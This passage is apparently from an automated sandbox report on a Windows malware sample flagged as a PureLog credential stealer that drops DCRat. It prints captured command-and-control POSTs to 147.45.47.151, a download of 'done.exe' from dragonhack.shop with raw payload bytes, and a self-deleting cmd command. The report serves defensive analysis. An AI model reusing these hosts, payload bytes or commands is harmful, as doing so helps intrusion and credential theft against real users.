                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:20.163121939 CET2512OUTData Raw: 52 5b 5f 5b 5b 5c 55 5f 58 57 5a 57 52 5d 51 55 5b 51 5d 44 57 5f 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[_[[\U_XWZWR]QU[Q]DW_PY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^&$ U66_>', $#"2)8*8"# :.\%!Z+
                                                                                          Dec 10, 2024 07:30:21.072921991 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:21.312171936 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          88192.168.2.849988147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:21.550611973 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:21.897646904 CET2512OUTData Raw: 52 5c 5f 5e 5b 5b 55 50 58 57 5a 57 52 5c 51 55 5b 59 5d 43 57 56 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_^[[UPXWZWR\QU[Y]CWVP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"]%?$^#6T"!>=?\'<?3$">1[<8,W)41'[9.\%!Z+
                                                                                          Dec 10, 2024 07:30:22.817718983 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:23.059109926 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          89192.168.2.849989147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:21.731026888 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:22.088767052 CET2004OUTData Raw: 52 5b 5f 53 5e 58 55 50 58 57 5a 57 52 56 51 5d 5b 50 5d 49 57 56 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[_S^XUPXWZWRVQ][P]IWVPY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^%,,^7"55:>=,'?$\3(5.=Y<(,V>=Y423Z9.\%!Z+(
                                                                                          Dec 10, 2024 07:30:22.991939068 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:23.224160910 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 5f 23 07 30 02 26 23 0e 55 2e 32 2f 13 32 2e 3f 44 2b 22 2a 1b 25 3b 28 05 2e 54 3f 55 2a 2e 39 59 3f 3a 3b 0f 3f 2f 27 1f 24 25 21 46 0c 1d 27 07 30 15 0f 01 33 04 3b 5d 27 3f 01 1d 24 32 19 58 3d 30 27 0b 37 1d 33 5e 30 1d 3f 0e 3b 5b 35 08 38 1b 21 1a 2a 31 32 57 32 28 22 57 0d 12 24 0d 24 30 0f 12 34 32 0c 1c 22 0f 34 54 2b 43 20 5b 27 10 27 1f 35 14 39 5d 27 22 28 12 34 0e 2b 02 3f 05 00 10 26 04 22 53 30 01 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%_#0&#U.2/2.?D+"*%;(.T?U*.9Y?:;?/'$%!F'03;]'?$2X=0'73^0?;[58!*12W2("W$$042"4T+C [''59]'"(4+?&"S0 ^*+U?WT0


                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.84970691.149.219.454437520C:\Users\user\Desktop\Wh2c6sgwRo.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-10 06:27:49 UTC73OUTGET /done.exe HTTP/1.1
                                                                                          Host: dragonhack.shop
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-10 06:27:50 UTC280INHTTP/1.1 200 OK
                                                                                          Date: Tue, 10 Dec 2024 06:27:59 GMT
                                                                                          Server: Apache/2
                                                                                          Upgrade: h2,h2c
                                                                                          Connection: Upgrade, close
                                                                                          Last-Modified: Sun, 08 Dec 2024 03:03:01 GMT
                                                                                          ETag: "dca00-628b97c6a9ed8"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 903680
                                                                                          Content-Type: application/x-msdownload
                                                                                          2024-12-10 06:27:50 UTC7912INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 75 ac 07 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 08 00 00 c2 0d 00 00 06 00 00 00 00 00 00 ce e1 0d 00 00 20 00 00 00 00 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0e 00 00 02 00 00 40 83 0e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELue" @ @@@
                                                                                          2024-12-10 06:27:50 UTC8000INData Raw: 08 00 00 00 70 00 00 00 00 00 00 00 08 00 00 00 30 00 00 00 00 00 00 00 09 00 00 00 c1 00 00 00 50 00 00 00 07 00 00 00 0a 00 00 00 00 00 00 00 08 00 00 00 60 00 00 00 00 00 00 00 08 00 00 00 20 00 00 00 00 00 00 00 09 00 00 00 a1 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 80 00 00 00 00 00 00 00 08 00 00 00 40 00 00 00 00 00 00 00 09 00 00 00 e1 00 00 00 50 00 00 00 07 00 00 00 06 00 00 00 00 00 00 00 08 00 00 00 58 00 00 00 00 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 09 00 00 00 91 00 00 00 53 00 00 00 07 00 00 00 3b 00 00 00 00 00 00 00 08 00 00 00 78 00 00 00 00 00 00 00 08 00 00 00 38 00 00 00 00 00 00 00 09 00 00 00 d1 00 00 00 51 00 00 00 07 00 00 00 11 00 00 00 00 00 00 00 08 00 00 00 68 00 00 00 00 00 00 00 08 00 00
                                                                                          Data Ascii: p0P` @PXS;x8Qh
                                                                                          2024-12-10 06:27:50 UTC8000INData Raw: 0d 04 10 04 13 04 e0 03 b0 04 b3 04 b6 04 dd 03 0d 06 0b 06 58 81 ef 05 05 06 59 81 5b 81 5d 81 05 04 08 04 0b 04 00 00 00 00 00 00 00 00 00 00 0f 06 13 06 5f 81 ed 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6f 00 00 00 25 04 1e 04 65 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 8b 04 91 04 97 04 fa 05 47 04 97 03 60 81 ab 04 ae 04 3a 04 f8 03 f3 03 f6 03 35 04 fb 03 fe 03 7e 04 84 04 01
                                                                                          Data Ascii: XY[]_o%e"G`:5~
                                                                                          2024-12-10 06:27:50 UTC8000INData Raw: 28 20 02 00 06 02 02 7b 7f 01 00 04 7d 7a 01 00 04 02 7b 67 01 00 04 6f ce 02 00 06 2a 82 02 7e 5b 01 00 04 17 62 05 2d 03 16 2b 01 17 58 19 28 15 02 00 06 02 03 04 17 28 1c 02 00 06 2a 1e 02 7b 9b 01 00 04 2a 22 02 03 7d 9b 01 00 04 2a 46 02 03 04 05 7e 53 01 00 04 0e 04 28 28 02 00 06 2a b2 02 28 36 00 00 0a 02 03 7d 9c 01 00 04 02 04 7d 9d 01 00 04 02 05 7d 9e 01 00 04 02 0e 04 7d 9f 01 00 04 02 0e 05 7d a0 01 00 04 2a 22 7e a1 01 00 04 02 9a 2a 2e 02 03 04 1c 05 28 37 02 00 06 2a 8e 02 28 45 02 00 0a 02 03 7d a3 01 00 04 02 03 04 05 20 9f 07 00 00 0e 04 73 a4 02 00 06 7d a2 01 00 04 2a 82 02 7b a4 01 00 04 2c 0b 72 c0 80 06 70 73 46 02 00 0a 7a 02 7b a2 01 00 04 03 7d 87 02 00 04 2a 92 02 7b a4 01 00 04 2c 0b 72 c0 80 06 70 73 46 02 00 0a 7a 02 7b a2
                                                                                          Data Ascii: ( {}z{go*~[b-+X((*{*"}*F~S((*(6}}}}}*"~*.(7*(E} s}*{,rpsFz{}*{,rpsFz{
                                                                                          2024-12-10 06:27:50 UTC8000INData Raw: 02 28 36 00 00 0a 02 03 7d a8 03 00 04 02 04 7d a1 03 00 04 2a 56 02 7b a9 03 00 04 2d 06 02 28 36 05 00 06 02 7b a0 03 00 04 2a 1e 02 7b 9e 03 00 04 2a 26 02 7b a1 03 00 04 1e 5b 2a 3a 02 28 33 05 00 06 18 5b 1f 0a 58 18 58 2a 56 02 7b a9 03 00 04 2d 06 02 28 36 05 00 06 02 7b a4 03 00 04 2a 56 02 7b a9 03 00 04 2d 06 02 28 36 05 00 06 02 7b a2 03 00 04 2a 82 02 03 04 0e 04 28 3b 05 00 06 03 2d 0b 72 c5 00 00 70 73 49 00 00 0a 7a 02 05 7d b5 03 00 04 2a 36 02 7b ad 03 00 04 17 2e 02 16 2a 17 2a 2a 02 7b ad 03 00 04 16 fe 01 2a 32 02 7b ac 03 00 04 6f 15 00 00 0a 2a a6 02 19 8d 66 00 00 01 25 d0 d1 04 00 04 28 53 02 00 0a 7d bb 03 00 04 02 73 df 02 00 06 7d bc 03 00 04 02 28 36 00 00 0a 2a 6e 73 4f 05 00 06 02 2d 0b 72 be d2 06 70 73 e5 04 00 06 7a 25 02
                                                                                          Data Ascii: (6}}*V{-(6{*{*&{[*:(3[XX*V{-(6{*V{-(6{*(;-rpsIz}*6{.***{*2{o*f%(S}s}(6*nsO-rpsz%
                                                                                          2024-12-10 06:27:50 UTC8000INData Raw: 5e 00 00 0a 7a 04 6f 15 00 00 06 28 3f 00 00 0a 0c 08 2c 0c 00 72 31 02 00 70 73 5f 00 00 0a 7a 02 04 6f 15 00 00 06 28 2c 00 00 06 0d 09 2c 1c 00 72 75 02 00 70 04 6f 15 00 00 06 72 9b 02 00 70 28 60 00 00 0a 73 5f 00 00 0a 7a 04 02 6f 1a 00 00 06 00 02 7b 1f 00 00 04 03 04 6f 61 00 00 0a 00 02 7b 20 00 00 04 04 6f 15 00 00 06 04 6f 62 00 00 0a 00 2a 00 00 13 30 02 00 2e 00 00 00 0b 00 00 11 00 02 7b 1f 00 00 04 03 6f 63 00 00 0a 0a 02 7b 1f 00 00 04 03 6f 64 00 00 0a 00 02 7b 20 00 00 04 06 6f 15 00 00 06 6f 65 00 00 0a 26 2a 00 00 13 30 02 00 12 00 00 00 0b 00 00 11 00 02 7b 1f 00 00 04 03 6f 63 00 00 0a 0a 2b 00 06 2a 00 00 13 30 03 00 79 00 00 00 0c 00 00 11 00 02 7b 1f 00 00 04 03 6f 63 00 00 0a 6f 15 00 00 06 04 6f 15 00 00 06 28 66 00 00 0a 0a 06
                                                                                          Data Ascii: ^zo(?,r1ps_zo(,,ruporp(`s_zo{oa{ oob*0.{oc{od{ ooe&*0{oc+*0y{ocoo(f
                                                                                          2024-12-10 06:27:50 UTC8000INData Raw: 00 00 2b 0c 08 16 6f 88 00 00 0a 0d 08 17 6f 88 00 00 0a 13 04 08 18 6f 88 00 00 0a 28 f7 00 00 06 28 07 00 00 2b 13 05 73 2b 01 00 06 17 20 3f 42 0f 00 28 2a 01 00 06 13 06 73 bf 00 00 0a 25 72 b7 03 00 70 73 c0 00 00 0a 11 06 13 0b 12 0b 28 c1 00 00 0a 13 09 25 11 09 7e 52 00 00 04 6f c2 00 00 0a 00 11 06 17 58 13 0b 12 0b 28 c1 00 00 0a 13 0a 25 11 0a 09 02 7c 46 00 00 04 28 6c 01 00 06 28 3b 00 00 0a 28 f2 00 00 06 6f c2 00 00 0a 00 6f c3 00 00 0a 00 13 07 02 7b 46 00 00 04 11 07 11 06 28 0f 01 00 06 02 7c 46 00 00 04 28 6c 01 00 06 12 06 28 c1 00 00 0a 7e 52 00 00 04 28 60 00 00 0a 28 f1 00 00 06 6f c4 00 00 0a 02 7c 46 00 00 04 28 6c 01 00 06 12 06 28 c1 00 00 0a 09 02 7c 46 00 00 04 28 6c 01 00 06 28 3b 00 00 0a 28 f2 00 00 06 28 60 00 00 0a 28 f1
                                                                                          Data Ascii: +ooo((+s+ ?B(*s%rps(%~RoX(%|F(l(;(oo{F(|F(l(~R(`(o|F(l(|F(l(;((`(
                                                                                          2024-12-10 06:27:50 UTC8000INData Raw: 32 bf 72 96 12 00 70 13 05 2b 00 11 05 2a 00 00 01 10 00 00 00 00 22 00 2c 4e 00 05 03 00 00 01 1b 30 02 00 9c 00 00 00 40 00 00 11 00 00 28 9e 00 00 06 0a 28 a1 00 00 06 72 42 13 00 70 28 3b 00 00 0a 28 4c 01 00 0a 73 06 00 00 06 28 0d 00 00 06 74 0d 00 00 02 0b 00 07 6f 30 00 00 06 0c 2b 3d 08 6f 4d 01 00 0a 74 0d 00 00 02 0d 00 09 72 70 13 00 70 6f 28 00 00 06 74 0c 00 00 02 13 04 11 04 6f 20 00 00 06 06 28 82 00 00 0a 13 05 11 05 2c 0a 09 6f 15 00 00 06 13 06 de 27 00 08 6f 1f 00 00 0a 2d bb de 0b 08 2c 07 08 6f 0f 00 00 0a 00 dc 00 de 05 26 00 00 de 00 72 96 12 00 70 13 06 2b 00 11 06 2a 01 1c 00 00 02 00 34 00 49 7d 00 0b 00 00 00 00 00 00 01 00 8a 8b 00 05 03 00 00 01 1b 30 04 00 6a 00 00 00 3f 00 00 11 00 00 18 8d 9d 00 00 01 25 16 7e 47 01 00 0a
                                                                                          Data Ascii: 2rp+*",N0@((rBp(;(Ls(to0+=oMtrppo(to (,o'o-,o&rp+*4I}0j?%~G
                                                                                          2024-12-10 06:27:50 UTC8000INData Raw: 28 ed 00 00 06 26 06 6f 10 00 00 0a 28 9b 01 00 0a 72 51 5a 06 70 6f 97 00 00 0a 0b 2b 00 07 2a 13 30 04 00 30 00 00 00 60 00 00 11 00 03 73 7b 00 00 0a 0a 06 6f 9a 01 00 0a 17 58 0b 02 6f 9c 01 00 0a 16 06 12 01 28 eb 00 00 06 2d 03 14 2b 06 06 6f 10 00 00 0a 0c 2b 00 08 2a 1b 30 03 00 6d 00 00 00 61 00 00 11 00 28 9d 01 00 0a 0a 00 28 16 01 00 0a 02 6f dd 00 00 0a 0b 06 07 6f 9e 01 00 0a 0c 73 38 00 00 0a 0d 16 13 04 2b 21 00 09 08 11 04 8f 71 00 00 01 72 af 63 06 70 28 9f 01 00 0a 6f af 00 00 0a 26 00 11 04 17 58 13 04 11 04 08 8e 69 fe 04 13 05 11 05 2d d2 09 6f 10 00 00 0a 13 06 de 0b 06 2c 07 06 6f 0f 00 00 0a 00 dc 11 06 2a 00 00 00 01 10 00 00 02 00 07 00 58 5f 00 0b 00 00 00 00 1b 30 04 00 5c 00 00 00 62 00 00 11 00 73 a0 01 00 0a 0a 00 72 0f 04
                                                                                          Data Ascii: (&o(rQZpo+*00`s{oXo(-+o+*0ma((oos8+!qrcp(o&Xi-o,o*X_0\bsr
                                                                                          2024-12-10 06:27:50 UTC8000INData Raw: 01 00 0a 0b 12 01 28 e1 01 00 0a 28 e2 01 00 0a 6f e3 01 00 0a 58 73 e4 01 00 0a 80 b7 00 00 04 00 7e b7 00 00 04 0c 2b 00 08 2a 00 13 30 02 00 11 00 00 00 09 00 00 11 00 28 28 01 00 06 03 6f e5 01 00 0a 0a 2b 00 06 2a 00 00 00 13 30 03 00 12 00 00 00 09 00 00 11 00 28 28 01 00 06 03 04 6f e6 01 00 0a 0a 2b 00 06 2a 00 00 13 30 03 00 5b 00 00 00 4f 00 00 11 00 02 7c e9 01 00 0a 28 6c 01 00 06 02 7c ea 01 00 0a 28 c1 00 00 0a 03 28 60 00 00 0a 28 f1 00 00 06 0a 02 7b e8 01 00 0a 06 6f eb 01 00 0a 0b 07 2c 12 00 02 7b e8 01 00 0a 06 04 6f ec 01 00 0a 00 00 2b 10 00 02 7b e8 01 00 0a 06 04 6f ed 01 00 0a 00 00 06 0c 2b 00 08 2a 00 13 30 01 00 16 00 00 00 25 00 00 11 00 02 7b e8 01 00 0a 28 3a 00 00 06 28 f6 00 00 06 0a 2b 00 06 2a 00 00 13 30 04 00 c7 00 00
                                                                                          Data Ascii: ((oXs~+*0((o+*0((o+*0[O|(l|((`({o,{o+{o+*0%{(:(+*0


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:01:27:38
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Users\user\Desktop\Wh2c6sgwRo.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                                                                          Imagebase:0x1905ff00000
                                                                                          File size:400'384 bytes
                                                                                          MD5 hash:43D30C776F593EFDF5416AB4142442D6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:01:27:51
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe"
                                                                                          Imagebase:0xcf0000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000002.00000000.1547271116.0000000000CF2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:01:27:51
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                                                                          Imagebase:0x7ff71c6d0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:01:27:51
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:01:27:51
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\choice.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:choice /C Y /N /D Y /T 3
                                                                                          Imagebase:0x7ff6a2940000
                                                                                          File size:35'840 bytes
                                                                                          MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:01:27:54
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"
                                                                                          Imagebase:0x7ff654610000
                                                                                          File size:2'759'232 bytes
                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:01:27:54
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:01:27:54
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES459B.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP"
                                                                                          Imagebase:0x7ff7ae190000
                                                                                          File size:52'744 bytes
                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:01:27:55
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"
                                                                                          Imagebase:0x7ff654610000
                                                                                          File size:2'759'232 bytes
                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:01:27:55
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:01:27:55
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4770.tmp" "c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP"
                                                                                          Imagebase:0x7ff7ae190000
                                                                                          File size:52'744 bytes
                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:27
                                                                                          Start time:01:27:56
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
